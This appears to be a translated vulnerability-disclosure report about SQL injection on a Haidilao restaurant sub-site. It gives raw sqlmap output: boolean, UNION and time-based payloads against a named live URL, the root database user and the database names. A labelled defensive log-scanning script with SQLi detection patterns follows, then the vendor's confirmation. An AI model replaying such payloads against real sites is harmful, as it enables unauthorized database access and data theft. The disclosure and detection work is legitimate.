2015-12-21: Details have been reported to the vendor and are awaiting vendor processing
2015-12-21: The vendor has confirmed; details are disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and experts in the relevant field
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public
SQL injection vulnerability on a Haidilao sub-site
Where's the gift you promised! I worked so hard digging for this hole, where's the promised gift? Site: http://kr.haidilao.com Vulnerable URL:
http://kr.haidilao.com/index.php/Dishes/feature/id/101
Injection tested with sqlmap
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://kr.haidilao.com:80/index.php/Dishes/feature/id/101 AND 7316=7316

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://kr.haidilao.com:80/index.php/Dishes/feature/id/101 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a767a763a,0x61654e59565551654f46,0x3a6d77613a), NULL, NU

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://kr.haidilao.com:80/index.php/Dishes/feature/id/101 AND SLEEP(5)
---
[11:22:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[11:22:04] [INFO] fetching current user
current user: 'root@localhost'
[11:22:04] [INFO] fetching database names
available databases [4]:
[*] h_hdl
[*] information_schema
[*] mysql
[*] test
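As an added defender-side example (not part of the original report), the script below scans Apache access-log lines for the three payload shapes sqlmap reported above (AND n=n, UNION ALL SELECT, SLEEP()) in a ThinkPHP-style path parameter. The log lines, client IP and timestamps are constructed for the example; the detection rules are assumptions, not a complete SQLi signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not from the report). The
# request paths mirror the sqlmap techniques listed in the output above.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Dec/2015:11:22:04 +0800] "GET /index.php/Dishes/feature/id/101 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Dec/2015:11:22:04 +0800] "GET /index.php/Dishes/feature/id/101%20AND%207316=7316 HTTP/1.1" 200 5123 "-" "sqlmap/1.0"
203.0.113.5 - - [21/Dec/2015:11:22:05 +0800] "GET /index.php/Dishes/feature/id/101%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x3a767a763a,0x61654e59565551654f46,0x3a6d77613a),NULL,NULL HTTP/1.1" 200 5200 "-" "sqlmap/1.0"
203.0.113.5 - - [21/Dec/2015:11:22:10 +0800] "GET /index.php/Dishes/feature/id/101%20AND%20SLEEP(5) HTTP/1.1" 200 5123 "-" "sqlmap/1.0"
"""

# Apache "combined" log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"'
)

# Each rule is (technique name as sqlmap labels it, regex on the decoded, lower-cased path).
RULES = [
    ("boolean-based blind", re.compile(r"\band\s+\d+\s*=\s*\d+\b")),
    ("union query", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(")),
]


def classify_path(path):
    """Return the technique names whose pattern matches the URL-decoded path."""
    decoded = unquote_plus(path).lower()
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text):
    """Return (ip, path, techniques) for every request that trips at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        techniques = classify_path(m.group("path"))
        if techniques:
            hits.append((m.group("ip"), m.group("path"), techniques))
    return hits


if __name__ == "__main__":
    for ip, path, techniques in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(techniques), path)
```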
OK, that's all. I want my gift! Where's the promised gift!
You know what I mean, gift please!
Severity: Medium
Vulnerability Rank: 5
Confirmation time: 2015-12-21 12:25
Thank you, we have assigned staff to fix it.
None